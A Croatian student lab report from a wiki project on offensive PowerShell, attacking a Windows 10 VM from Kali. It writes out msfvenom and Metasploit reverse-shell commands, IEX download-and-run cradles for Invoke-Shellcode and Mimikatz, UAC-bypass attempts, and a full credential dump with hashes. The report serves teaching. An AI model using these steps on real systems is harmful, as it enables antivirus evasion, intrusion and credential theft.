Offensive powershell

Izvor: SIS Wiki
Skoči na: orijentacija, traži

Temu rezervirao: Tarek Saghir

Uvod

Powershell je ugrađeni 'command shell' kojeg podržavaju svi Windowsi (počevši od Windows 7) i sadrži veliku fleksibilnost oko administracije Windows sustava.Zbog te fleksibilnosti sve više se koristi kod napadača jer se Powershell kod može pokrenuti u memoriji gdje antivirus ne može detektirati opasanost. Također kod se može skinuti sa web stranice i pokrenuti je u memoriji te ima mogućnost pokretanja .Net koda. Korištenje ofenzivnog Powershella je u porastu od 2012. kada se pojavio PowerSploit, odnosno Post-Exploitation Framework. Koristi se za pregled podataka, eskalacija privilegijskih prava, krađa vjerodajnica, itd.[1]

Sadržaj


Napadači imaju više opcija, a korištenje PowerShella je jedna od njih koja ima svoje napadačke sposobnosti i prednosti:[1][2]


Neki od PowerShell napadačkih alata su:[1][2]

U ovom projektu detaljnije ćemo pogledati PowerSploit i Invoke-Mimikatz alate.

Postavljanje radne okoline

Alati koji se koriste u ovom projektu su Oracle VirtualBox te .iso slike Kali Linux-a (u nastavku Kali sustav) i Windows 10 (u nastavku Windows sustav) operacijskih sustava. Osim instaliranja sustava trebale su se složiti mrežne postavke gdje se postavilo da mreža bude „Bridged Networking“. Da bi testirali je li nam radna okolina dobro postavljena pridobio se shell pristup Windows sustavu preko msfconsole u Kali sustavu koristeći web_delivery exploit.

Postavljanje exploit-a

U Kali sustavu otvara se msf konzola koja je najpopularnije sučelje Metasploit Framework-a. Preko konzole msf-a odabire se željeni exploit i postavlja se slušatelj koji čeka kompromitirano računalo.
Matasploit je alat za izradu exploit koda koji se koristi za napad na udaljenu žrtvu. Trenutno sadrži preko 438 payload-a te neki od njih su: [3][4]


Na slici 1. prikazane su naredbe koje su unešene u msf konzolu prilikom odabira exploita. Odabran je web_delivery exploit, postavljen je LHOST(192.168.1.15) ip adrese u Kali sustavu, postavljen je target(cilj explita) čija je dafualt vrijednost 0(Python) na 2(PowerShell) te na kraju postavljen je payload gdje označavamo da se radi o Windows operacijskom sustavu, da će se koristiti meterpreter za kontrolu nad računalom i da će se to sve obaviti preko reverse_tcp-a.

Slika 1. Naredbe za metasploit

Nakon napisanih naredbi napisana je naredba show options koja nam prikazuje sve postavke koje smo napravili. Sve postavke su prikazane na slici 2.

Slika 2. Prikaz postavki

Sljedeće naredba je exploit (Slika 3.) koja pokreće listener i generira naredbu koju treba izvršiti u Windows sustavu kako bi se dobio shell pristup (Slika 4.). Exploit radi u pozadini i pokreće se reverse TCP handler na adresi 192.168.1.15:4444. Nardba koja je generirana pokreće se u Windows 'Run'(windows key + R) aplikaciji a zapravo pokreće powershell gdje pokreće web klijent i skida string sa IP adrese Kali sustava. Kada se naredba izvrši (Slika 3.) vidimo u zadnjoj linija da je meterpreter sesija otvorena i da se slušatelj radi na adresi 192.168.1.15:4444(Kali) prema 192.168.1.14:49484 (Windows).

Slika 3. Postavljen exploit
Slika 4. Pokretanje exploit naredbe u Windows sustavu

Kada se naredba izvršila u Windows sustavu, pomoću naredbe session -l ispisuje se lista svih sesisja. Ta lista je zapisana tablicom u kojoj vidimo ID sesije, koji je tip, informacije o računalu kojemu je otvoren pristup, te konekciju koja prikazuje IP adrese oba sustava (Slika 5.). Naredbom sessions -i 1 radi se interakcija sa sesijom ID-a 1 te se dobiva pristup računalu preko meterpreter naredbene linije. Upisom naredbe help u liniju dobije se popis svih naredbi koje možemo izvršiti koje će se izvršiti na kompromitiranom računali. Tako napadač preko osnovnih naredbi može vidjeti sve procese koji se vrte u pozadini, može migrirati sa jednog na drugi proces te može uspavati meterpreter pa ga ponovno kasnije aktivirati. Pomoću File system naredba može dowload-ati i upload-ati datoteke po želji te stvarati nove direktorije, itd. Pomoću Networking naredba ima pristup informacijama mreže kompromitiranog računala, preko System naredba ima pristup sustavu, logovima i procesima i shell-u. Također, najzanimljivije je što ima pristup web kameri te može snimati zvukove preko mikrofona kamere, može započeti video chat, a isto tako može spremiti sliku trenutačnog zaslona i vidjeti što žrtva napada radi. Na slici 6. je prikazano korištenje screenshot naredbe gdje se slika spremila u root od Kali sustava.

Slika 5. Prikaz trenutačnih sesija s kojima je moguća interakcija
Slika 6. Screenshot spremljen na Kali sustavu

PowerSploit

PowerSploit (u nastavku PS) je kolekcija PowerShell skripta koje su koristan alat za penetracijske testere u post-eksploatacijskoj fazi penetracijskog testiranja. Kolekcija puno mogućnosti što PS može učiniti jer je lakše uočiti slabe točke na potencijalnoj žrtvi. Ako je netko primamljiva meta nije pitanje hoće li se dogoditi napad nego već kada će se dogoditi napad. Pomoću PS-a pronalaze se slabe točke u na računalima, organizaciji, poduzeću koje penetracijski tester sakljuplja i sastavlja izvješće puno korisnih informacija. Te informacije vrlo važne ukoliko se žele donositi daljnje odluke o sigurnosti u organizaciji.[5]

Na github linku: https://github.com/PowerShellMafia/PowerSploit nalazi se cijela kolekcija gdje se vidi popis svih kompromintiranih naredbi, a i sam repozitorij gdje u skriptama pronalazimo komentare ukoliko se netko želi dodatno informirati na koji način rade pojedine skripte. Na repozitoriju su sve skripte organizirane i kategorizirane na sljedeći način:[5]

Kategorija Opis
Antivirus Bypass Pronalazi Bajtove datoteke koje imaju isti potpis u antivirusu
Code execution Koristi se za izvršenje koda na komprominitiranom računalu
Exfiltration Manipulacija i sakupljanje informacija i podataka iz kompromitiranog računala
Persistence Održavanje kontrole kompromitiranog računla dodavanjem dodatnog sadržaja skriptama
PE Tools PowerShell cmdlet-i za enumeracije
Recon Traženje podataka i tragova koristeći kompromitirano računalo
Reverse Engineering Pomoć u reverse inženjeringu i malware analizi. (Pomaknuto u PowerShellArsenal)
Script Modification Kreiranje i manipuliranje skriptama na kompromitiranom računalu

U PS-u ima puno skripta, ali ovdje će se detaljnije proučiti Invoke-Shellcode skripta te Invoke-Mimikatz skripta.

Invoke-Shellcode[5]
To je PowerShell skripta koje se koristi za ubacivanje u proizvoljnog shellcode-a ili Metasploit pyload-a u novi ili postoći proces te ga izvršava. Prednost takvih skripta jest da su neprepoznatljive antivirusnim sustavima, izvršavaju se u memoriji te niti jedan podatak se ne zapisuje na tvrdi disk. Instaliranje skripte se izvršava upisom naredbe u PowerShell komandnu liniju:
IEX(New-Object Net.WebClient).DownloadString("https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1")

Način na koji se dobio pristup sustavu biti će objašnjeno u sljedećem poglavlju

Mimikatz[6]
Alat koji se koristi većinom za prikupljanje kredencijskih podataka iz Windows OS-a. To je Windows x32/x64 program kodiran u C programskom jeziku. Autor je Benjamin Deply (@gentilkiwi), a napravljen je 2007. godine. Većina mimikatz funkcionalnosti je dostupna u PS-u preko naredbe Invoke-Mimikatz koja reflektivno u memoriju ubacuje Mimikatz 2.0 pomoću skripte Invoke-ReflectivePEInjection odnosno, reflektivno se ubacuje Mimikatz DLL, koji je ugrađen u skriptu, u memoriju.

Invoke-ShellCode i Invoke-Mimikatz u akciji

U drugom djelu zadatka biti će prikazano kako otvoriti meterpreter shellcode sa msfvenom-om na Kali OS koji ćemo uploadati na repozitorij github-a te na Windows OS skinuti PowerSploit the pomoću skripte Invoke-Shellcode dobiti pristup računalu. Ono što je bitno za zapaziti ovdje jest da se će meterpreter shellcode i PS skripta biti ubačena u memoriju pa Windows Defender neće zapaziti nikakvu prijetnju. Na našem Kali napadačkom sustavu ćemo imati pristup meterpreter ljusci.
U drugom dijelu ćemo prikazati kako se može podizati sustavska privilegija, otvoriti powershell na Kali sustavu preko meterpreter ljuske te kako skinuti PS Mimikatz i izvršiti Inovke-Mimikatz skriptu opet zaobilazeći bilo kakav antivirusni sustav jer će se sve to izvršiti u memoriji, Na kraju ćemo ispisati sve kredencijske oznake u Windows OS-u.

Pristup žrtvi preko Invoke-Shellcode

Kali Linux

Za početak u Kali sustavu napravljen je meterpreter shellcode sa msfvenomom. To je sučelje u komandoj linij preko kojeg se može brzo napisati napisati upit koji je potreban. Glavna prednost je njegova odvojenost kao zaseban alat, ima standardizirane opcije u komandnoj liniji, puno brže i lakše je napisati naredbu koja je potrebna.[7]
Nakon toga taj shellcode uploadan je na github repozitorij preko kojega će se u raw formatu skinuti i izvršiti u jednoj liniji kratke PowerShell skripte na Windows sustavu. Za izvršenje te skripte potrebno je također skinuti u raw formatu Invoke-Shellcode skriptu sa PowerSploit[8]
github repozitorija. To će također biti jednolinijska kratka skripta koja će se izvršiti u PowerShell-u.

Naredba za kreiranje msfvenom shellcode-a:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.15
LPORT=443 -f powershell -o Desktorp/MeterpStager

Taj shellcode se uploadao na github repozitorij i koristit će kasnije kad će se izvršavati naredbe na žrtvinom računalu (Windows), primjer kako to izgleda možete pogledati u raw formatu na https://raw.githubusercontent.com/tsaghir/SIS/master/pentest.

Nadalje, otvara se opet msfconsole kako bi se postavio listener:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf exploit(handler) > set LHOST=192.168.1.15
LHOST => 192.168.1.15
msf exploit(handler) > LPORT=443
LPORT => 443
msf exploit(handler) > exploit

Listener je postavljen i očekuje radnju koja će se u sljedećem koraku izvršiti u Windows sustavu.


Windows 10

Prebacujemo se na Windows sustav gdje otvaramo PowerShell i upisujemo sljedeće dvije naredbe:

Slika 7. PowerShell naredbe za Invoke-Shellcode




Na slici vidimo jednolinijske skripte gdje:

  1. IEX otvara Internet Explorer, radi se novi objekt WebClient klase i skida se string pod zadanom url adresom
  2. Koristio se bitly za skraćivanje URL https://bitly.com/, ali u prvoj skripti skida se Invoke-Shellcode skripta https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1, dok se u drugoj skripti skida https://raw.githubusercontent.com/tsaghir/SIS/master/pentest shell code u raw formatu.

Za kraj upisuje se linika koda:

Invoke-Shellcode -Shellcode @($buf)

I naš shellcode se ubacuje u PowerShell proces. Na kraju to izgleda ovako:

Slika 8. Rezultat Invoke-Shellcode skripte u Kali i Windows operacijskim sustavima

Prva sesija je napravljena te je upisana naredba getsystem da bi se vidjelo je li imamo adminska prava. Na slici 9. prikazano je da nema adminska prava, sesija je prebačena u pozadinu i kreće se u misiju zaobilaženja User Access Contol-a kako bi se podigla privilegija na razinu admina.

bypassuac

Slika 9. getsystem i bypassuac

Ono što je potrebno za ovaj exploit jest sesija koja je postavljena pod ID. pa sve što je trebalo napraviti jest:

msf exploit(bypassuac) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf exploit(bypassuac) > set session 1
msf exploit(bypassuac) > exploit

Na žalost bypassuac ne radi za Windows 10 sustav i kao obavijest piše da sustav nije ranjiv(Slika 10.).

bypassuac_vbs

Slijedeći exploit je bio bypassuac_vbs kojemo je trebalo također postaviti sesiju i lport te samo pokrenuti exploit naredbom run, ali niti taj exploit nije radio jer je također pisalo da Windows 10 nije ranjiv. Slika 10. prikazuje rezultat:

Slika 10. Rezultat bypassuac_vbs exploit-a

bypassuac_injection

Sljedeći exploit je proradio i uspio je probiti UAC, ali je Virtalna mašina bila prespora, meterpreter je kasnije i samo odjednom se izgasio. Rezultat meterpreter otvorene sesije prikazano je na slici 11.

Slika 11. Rezultat bypassuac_injection exploit-a

ask i payload_inject

Zadnji pokušaj je bio kombinacija dvaju exploit-a. Za ask bilo je također potrebno postaviti sesiju već spomenutom naredbom te pokrenuti exploit gdje slika 12. prikazuje rezultat.

Slika 12. Rezultat ask exploit-a

Na slici 12 se vidi da upisom naredbe getsystem piše da smo dobili pristup adminskim pravima, ali prije toga nam se u Windows sustavu prikazao Yes/No box koji je prikazan na slici 13.

Slika 13. Rezultat u Windows sustavu nakon pokretanja ask exploit-a

zadnji korak je korištenje payload_inject exploita za kojeg je bilo potrebno upisati sljedeće naredbe:

msf exploit(payload_inject) > set payload windows/x64/powershell_reverse_tcp
payload => windows/x64/powershell_reverse_tcp
msf exploit(payload_inject) > exploit

Postavljen je payload i kada se exploit pokrene dobiva se pristup PowerShell kontorolama napadnutog računala. Sve što je preostalo jest ubaciti mimikatz koji se nalazi na github repozitoriju PowerSploit-a[8](Slika 14.)

Slika 14. Rezultat payload_inject exploit-a, PowerShell komandna linija

Na slici se također vidi da je pozvana naredba

IEX(New-Object Net.WebClient).DownloadString('http://bit.ly/1N83FO')

Gdje je opet korišten bitly alat za kraćenje URL-a, a u tom URL-u je zapravo raw format mimikatza sa github-a[8].
Nakon toga upisana je posljednja naredba u PowerShell-u

invoke-mimikatz

Koja izbacuje sve kredencijske podatke svih Windows korisničkih računa koji su napravljeni u kompromitiranom računalu, a to izgleda ovako:

PS C:\Users\PenTest> invoke-mimikatz

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */
ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 1762878 (00000000:001ae63e)
Session           : Interactive from 1
User Name         : PenTest
Domain            : DESKTOP-VM3QIJB
Logon Server      : DESKTOP-VM3QIJB
Logon Time        : 1/12/2017 1:35:30 AM
SID               : S-1-5-21-1138842331-819270373-2980095412-1001
	msv :	
	 [00000003] Primary
	 * Username : PenTest
	 * Domain   : DESKTOP-VM3QIJB
	 * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
	 * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
	 [00010000] CredentialKeys
	 * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
	 * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
	tspkg :	
	wdigest :	
	 * Username : PenTest
	 * Domain   : DESKTOP-VM3QIJB
	 * Password : (null)
	kerberos :	
	 * Username : PenTest
	 * Domain   : DESKTOP-VM3QIJB
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 1762076 (00000000:001ae31c)
Session           : Interactive from 1
User Name         : PenTest
Domain            : DESKTOP-VM3QIJB
Logon Server      : DESKTOP-VM3QIJB
Logon Time        : 1/12/2017 1:35:30 AM
SID               : S-1-5-21-1138842331-819270373-2980095412-1001
	msv :	
	 [00010000] CredentialKeys
	 * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
	 * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
	 [00000003] Primary
	 * Username : PenTest
	 * Domain   : DESKTOP-VM3QIJB
	 * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
	 * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
	tspkg :	
	wdigest :	
	 * Username : PenTest
	 * Domain   : DESKTOP-VM3QIJB
	 * Password : (null)
	kerberos :	
	 * Username : PenTest
	 * Domain   : DESKTOP-VM3QIJB
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 1/12/2017 1:35:01 AM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 49141 (00000000:0000bff5)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/12/2017 1:35:01 AM
SID               : S-1-5-90-0-1
	msv :	
	tspkg :	
	wdigest :	
	 * Username : DESKTOP-VM3QIJB$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 48672 (00000000:0000be20)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/12/2017 1:35:01 AM
SID               : S-1-5-90-0-1
	msv :	
	tspkg :	
	wdigest :	
	 * Username : DESKTOP-VM3QIJB$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DESKTOP-VM3QIJB$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 1/12/2017 1:35:01 AM
SID               : S-1-5-20
	msv :	
	tspkg :	
	wdigest :	
	 * Username : DESKTOP-VM3QIJB$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : desktop-vm3qijb$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 25653 (00000000:00006435)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 1/12/2017 1:35:00 AM
SID               : 
	msv :	
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DESKTOP-VM3QIJB$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 1/12/2017 1:35:00 AM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : DESKTOP-VM3QIJB$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : desktop-vm3qijb$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :	

mimikatz(powershell) # exit
Bye!

Kao što vidimo nama je interesantno da vidimo korisnika i na kojem je serveru:

User Name         : PenTest
Domain            : DESKTOP-VM3QIJB
Logon Server      : DESKTOP-VM3QIJB

vidimo username i password

* Username : PenTest
	 * Domain   : DESKTOP-VM3QIJB
	 * Password : (null)

te vidimo kredencijske ključeve

 [00010000] CredentialKeys
	 * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
	 * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709


Zaključak

Ovaj projekt je bio vrlo zanimljivo i poučno iskustvo. Naučio sam da u sigurnosti nije bitno hoćemo li biti napadnuti, već kada. Naravno ako smo dovoljno interesantna riba. Sa tehničkog aspekta bilo je vrlo zanimljivo koristiti Kali Linux i njegove alate i shvatio sam da me interesira penetracijsko testiranje Windows računala. Također, zanimljivo i zastrašujuće je bilo vidjeti koliko već gotovih skripta ima i što sve napadač može iskoristiti na svojoj žrtvi. Meni kao normalnom čovjeku, prisluškivanje preko mikrofona slušalica ili mikrofona web kamere, uzimanje screenshot-a trenutačnog stanja na računalu da se vidi čime se korisnik bavi te snimanje videa i slika preko web kamere je jednostavno zapanjujuće.Koliko sam dalje istraživao sve sam više razumio da je to zapravo samo vrh velike sante leda. Postavljanje radne okoline i Oracle VirtualBox-a bila je velika muka pogotovo oko instalacije VirtualBox guest additions-a, ali to je bilo posebno iskustvo koje mi je pružalo da više upoznam Linux operacijski sustavi i na koji način radi Kali općenito. Najinteresantniji dio je bio kako napadač može preko PowerShella izvršavati razne napade i izviđanje računala bez da se aktivira Antivirusni sustav jer se sve izvršava u memoriji i nema nikakvih dodirnih točaka sa diskom. Također osobna teza da je instaliran antivirusni sustav na računalu dovoljna obrana od napadača pada u vodu jer daljnjim istraživanjem otkrivam da napadač bez ikakvih problema raznim skriptama i exploit alatima zaobilazi bilo koji antivirusni sustav i User Acces Control u Windows operacijskim sustavima. U svakom slučaju ovo je bio jedan vrlo zanimljiv i interesantan projekt kojeg sam sa radošću pisao.

Literatura

  1. Metcalf, Sean (2016), PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection, Adsecurity, preuzeto 07.01.2017. sa: https://adsecurity.org/?p=2921
  2. Metcalf, Sean (2016), Detecting Offensive PowerShell Attack Tools, Adsecurity, preuzeto 07.01.2017. sa: https://adsecurity.org/?p=2604
  3. Offensive Security (2016), Using the Msfconsole Interface, Offensive Security, preuzeto 09.01.2017. sa: https://www.offensive-security.com/metasploit-unleashed/msfconsole/
  4. Wikipedia (2016), Metasploit Project, Wikipedia, preuzeto 11.01.2017. sa: https://en.wikipedia.org/wiki/Metasploit_Project
  5. Infosec Institute (2015), PowerShell Toolkit: PowerSploit, Infosec Institute, preuzeto 11.01.2017. sa: http://resources.infosecinstitute.com/powershell-toolkit-powersploit/
  6. Metcalf, Sean (2016), Unofficial Guide to Mimikatz & Command Reference, Adsecurity, preuzeto 11.01.2017. sa: https://adsecurity.org/?page_id=1821
  7. Offensive Security (2016),Using the MSFvenom Command Line Interface , preuzeto 12.01.2017. sa: https://www.offensive-security.com/metasploit-unleashed/msfvenom/
  8. PowerShell Mafia (2016), PowerSploit, preuzeto 12.01.2017. sa: https://github.com/PowerShellMafia/PowerSploit
  9. Microsoft (2016), WebClient Class, preuzeto 12.01.2017. sa: https://msdn.microsoft.com/en-us/library/system.net.webclient(v=vs.110).aspx
  10. Wonder HOWTO (2016), Bypass Antivirus Using Powershell and Metasploit (Kali Tutorial), preuzeto 12.01.2017 sa: http://null-byte.wonderhowto.com/how-to/bypass-antivirus-using-powershell-and-metasploit-kali-tutorial-0167601/
  11. Wikipedia (2016), Windows Defender, Wikipedia, preuzeto 12.01.2017. sa: https://en.wikipedia.org/wiki/Windows_Defender

Video literatura

  1. Using PowerSploit Invoke-Shellcode w/Meterpreter Shellcode created by msfvenom https://www.youtube.com/watch?v=otpPnWbEaDA
  2. Meterpreter to Interactive Powershell then running PowerSploit Invoke-Mimikatz https://www.youtube.com/watch?v=k0lz7OnTdYU
  3. Privilege Escalation Technique in Windows 10 - UAC ASK https://www.youtube.com/watch?v=OqmxRIqC3FE
  4. Metasploit - Reverse meterpreter shell -- DLL Injection using PowerSploit and Metasploit https://www.youtube.com/watch?v=yKoD5Oy8CKQ
  5. Takeover a windows machine using powershell and metasploit https://www.youtube.com/watch?v=ZNLEEbaga4w
  6. Installing Kali Linux 2016.1 on VirtualBox https://www.youtube.com/watch?v=GpTIM9OroIY
Osobni alati
Imenski prostori
Inačice
Radnje
Orijentacija
Traka s alatima